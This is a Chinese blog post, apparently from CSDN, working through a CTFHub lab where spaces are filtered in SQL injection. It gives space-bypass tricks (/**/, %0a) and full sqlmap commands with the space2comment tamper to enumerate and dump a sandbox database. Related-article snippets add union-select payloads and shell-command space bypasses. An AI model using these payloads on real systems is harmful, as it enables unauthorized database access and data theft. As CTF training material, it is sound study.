CTFHub题解-技能树-Web(SQL注入-过滤空格)

最新推荐文章于 2024-05-30 14:06:09 发布
最新推荐文章于 2024-05-30 14:06:09 发布
阅读量695 收藏 5
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51706044/article/details/117618471
版权

文章目录

前言

在本文中将会采用两种注入手法:SQLmap和手注,当然记录这篇文章主要是对SQLmap的使用进行一下学习

过滤空格

在这里插入图片描述

既然是过滤空格,绕过空格的方法:

1/**/
2()
3%0a

在这里插入图片描述

SQLmap

对于SQLmap的使用可以参考该笔者的文章

一、爆数据库

python sqlmap.py -u "http://challenge-ba6a5630047ce20b.sandbox.ctfhub.com:10800/?id=1" --dbs --tamper "space2comment.py"

说明:

space2comment.py

这是一个脚本,作用:是为了用/**/替换空格字符’ ‘
sqlmap中为了绕过过滤,在tamper中有很多脚本用于绕过,如:apostrophemask.py (作用是用utf8代替引号)等

在这里插入图片描述
在这里插入图片描述
可以看到在这里得到了四个库名

二、爆数据表

python sqlmap.py -u "http://challenge-ba6a5630047ce20b.sandbox.ctfhub.com:10800/?id=1" -D "sqli" --tables --tamper "space2comment.py"

在这里插入图片描述
在这里插入图片描述
得到两张表

三、爆数据库字段

python sqlmap.py -u "http://challenge-ba6a5630047ce20b.sandbox.ctfhub.com:10800/?id=1" -D "sqli" -T "wnilazwjye" --dump --tamper "space2comment.py"

在这里插入图片描述

在这里插入图片描述

得到flag

唤变
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
技能 题解
Y的博客
08-17 177
技能 题解 技能 题目 玩过DiabloDiabloDiablo的人对技能一定是很熟悉的。一颗技能的每个结点都是一项技能,要学会这项技能则需要耗费一定的技能点数。只有学会了某一项技能以后,才能继续学习它的后继技能。每项技能又有着不同的级别,级别越高效果越好,而技能的升级也是需要 耗费技能点数的。   有个玩家积攒了一定的技能点数,他想尽可能地利用这些技能点数来达到最好的效果。因此他给所有的级别都打上了分,他认为效果越好的分数也越高。现在他要你帮忙寻找一个分配技能点数的方案,使得分数总和最高。 输
实验舱OJ满分题解-1375、冒泡排序过程
06-03
实验舱OJ满分题解-1375、冒泡排序过程
CTFHub技能web之XSS
wzhwzh123321的博客
02-26 1092
在XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三题: DOM反射。
过滤空格ctfhub
2401_82985722的博客
04-02 328
注释过滤 /**/、/*!*/、//、#、--括号过滤 ()符号过滤 %00、%09、%20、%a0 %0a、%0b、%0c、%0d引号过滤 ' 、 "大小写过滤 大小写双关键字绕过 '+'正则表达式绕过 \s、\s*\s+ 表示匹配一个或多个空白字符,\s* 表示匹配零个或多个空白字符。
CTFHub-过滤空格
m0_51589948的博客
05-19 691
过滤空格 在输入正常的数字时发现页面不发生回显,但是当用/**/过滤空格时发现页面可以回显并且能生出信息 可以判断该注入应为空格过滤,将所有的空格转化为//后进行查询flag,查询库名 -1//union//select//database() 查询该库名下的数据表 -1//union//select//1,group//select(table_name)//from//information_schema.tables//where//schema_table=‘sqli’ 得出表名为news
ctfhub技能SQL注入空格过滤
Naptmn的博客
02-07 286
此处绕过空格过滤方法为/**/ 之后即可正常注入 1 2 3 4 得到flag
CTFHub_技能_Web之RCE——“过滤空格
Ho1aAs‘s Blog
07-28 956
文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 解题过程 查看网页显示的源码,和之前的一样,只是过滤空格 空格的表示方法 cat<file cat<>file cat${IFS}file 先查询 后打开 注意:FLAG藏在注释里,不是明文表示 完 欢迎在评论区留言 感谢浏览 ...
CTFHub笔记之技能 WEB:过滤空格
weixin_48799157的博客
03-21 2240
小白一个,如果错误请指正! 首先我们常规的去注入一下,发现之前使用的句子行不通,原因是空格键被过滤掉了。 那我们就得去学习一下怎么绕过空格过滤SQL注入绕过技巧 - VVVinson - 博客园1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方https://www.cnblogs.com/Vinson404/p...
CTF-Mobile-Tutorial:我写的一些Mobile CTF题解
03-28
CTF移动版 作者:wnagzihxa1n邮件: 作为一个CTF弱鸡,每次比赛除了湿敷们吊打,就是被湿敷们吊打 好在比赛的时候收集了过多的过渡,痛定思痛,努力学习,走向以后被湿敷们轻点吊打
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
基于python源码的0-1背包问题动态规划的题解.zip
01-21
01背包问题动态规划 基于python源码的0-1背包问题动态规划的题解
2022美赛B题题解-水电共享赛题题解.zip
01-21
2022美赛b题 2022美赛B题题解_水电共享赛题题解
ctfhub-过滤空格
m0_62094846的博客
12-15 873
<?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/ /", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $res = $m; }...
CTFhub 过滤空格
plant1234的博客
06-18 932
过滤空格: 首先这题,我们得知道用/**/来代替我们语句中的空格 进行注入 首先启动环境用: 1' 1'/**/and/**/1=1# 1/**/and/**/1=1 1/**/and/**/1=2 测出是否有注入 然后就报出库名: 520/**/union/**/select/**/1,database() 在报出表名: 在报出字段: 在报出内容得到flag: ...
CTFHub | 过滤空格
尼泊罗河伯的博客
06-20 1014
检查网页源代码发现这题如果有空格就不会执行,说明这题对空格做了过滤处理。同样在输入框中输入 IP 进行测试,可以正常回显。
CTFhub】命令注入过滤空格
manerzi的博客
10-25 621
CTFhub】命令注入过滤空格
CTFHub-空格过滤-wp
z1moq的博客
05-18 241
空格过滤 **原理:**在php中提前写好当输入字符中有空格时返回 “Hacker!!!” 来防止sql注入 空格为空字符,可用php中的多行注释/**/来代替空格,以正常执行sql语句 剩余做法与整数型注入相同
sql server:数据库处于单用户模式,当前某个用户已与其连接
最新发布
weixin_42874924的博客
05-30 471
sql server:数据库处于单用户模式,当前某个用户已与其连接
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值